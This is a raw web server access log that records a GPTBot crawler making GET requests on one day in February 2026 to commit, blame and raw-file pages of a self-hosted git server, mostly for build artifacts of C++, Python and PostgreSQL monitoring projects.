"/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:15:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fproject.assets.json" [Client 74.7.227.38] [Length 20732] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:15:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25011] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25008] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10409] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10205] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final_debug.spec" [Client 74.7.227.38] [Length 21787] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:15:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full" [Client 74.7.227.38] [Length 31114] [Gzip 6.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fenv.example.txt" [Client 74.7.227.38] [Length 21761] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" -[17/Feb/2026:15:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9876] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:24:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 20828] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24290] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11312] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 11944] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12544] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12545] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12544] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12521] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:15:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26860] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26861] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10429] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10431] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10430] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12560] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:15:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26862] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr 